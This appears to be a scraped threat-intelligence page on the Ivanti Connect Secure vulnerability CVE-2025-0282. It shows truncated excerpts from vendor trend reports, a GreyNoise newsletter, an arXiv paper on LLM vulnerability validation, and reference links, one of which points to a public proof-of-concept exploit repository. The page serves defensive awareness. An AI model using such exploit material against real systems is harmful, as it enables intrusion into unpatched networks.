The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs
Greynoiseio
NoiseLetter January 2025
blogs_greynoiseio
NoiseLetter January 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future
2025 Cloud Threat Hunting and Defense Landscape
# 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security ga
Recorded Future
H1 2025 Malware and Vulnerability Trends
blogs_recorded_future
H1 2025 Malware and Vulnerability Trends
# H1 2025 Malware and Vulnerability Trends
## Executive Summary
The first half of 2025 (H1 2025) reflected a rapidly evolving threat landscape defined by the convergence of persistent legacy threats and advanced new tactics.
The total disclosed CVEs increased by 16% from H1 2024, and threat actors exploited 161 vulnerabilities with assigned CVEs, with nearly half linked to malware or ransomware campaigns. Microsoft remained the most targeted vendor, while edge security and gateway devices continued to be high-value targets for initial access. Malware activity was similarly dynamic: while law enforcement takedowns disrupted major players like LummaC2, a resurgence of legacy malware such as Sality indicated that old tools still offer utility for modern actors. Remote access trojans (RATs)
arXiv
Automated Vulnerability Validation and Verification: A Large Language Model Approach
arxiv_fulltext·2025-11-13
Automated Vulnerability Validation and Verification: A Large Language Model Approach
Automated Vulnerability Validation and Verification: A Large Language Model Approach
Alireza Lotfi
Department of Computer Science
Purdue University
West Lafayette, IN, USA
[email protected]
Charalampos Katsis
Department of Computer Science
Purdue University
West Lafayette, IN, USA
[email protected]
Elisa Bertino
Department of Computer Science
Purdue University
West Lafayette, IN, USA
[email protected]
## Abstract
Software vulnerabilities remain a critical security challenge, providing entry points for attackers to compromise enterprise networks. Despite advances in security practices, the lack of high-quality datasets capturing the behavior of diverse exploits hinders effective vulnerability assessment and mitigation.
This paper introduces an end-to-end multi-step pipeline
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-dayhttps://www.cisa.gov/cisa-mitigation-instructions-cve-2025-0282https://github.com/sfewer-r7/CVE-2025-0282https://labs.watchtowr.com/exploitation-walkthrough-and-techniques-ivanti-connect-secure-rce-cve-2025-0282/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-0282https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2025-0282
2025-01-08
Published
2025-01-08
Added to CISA KEV
Exploited in the wild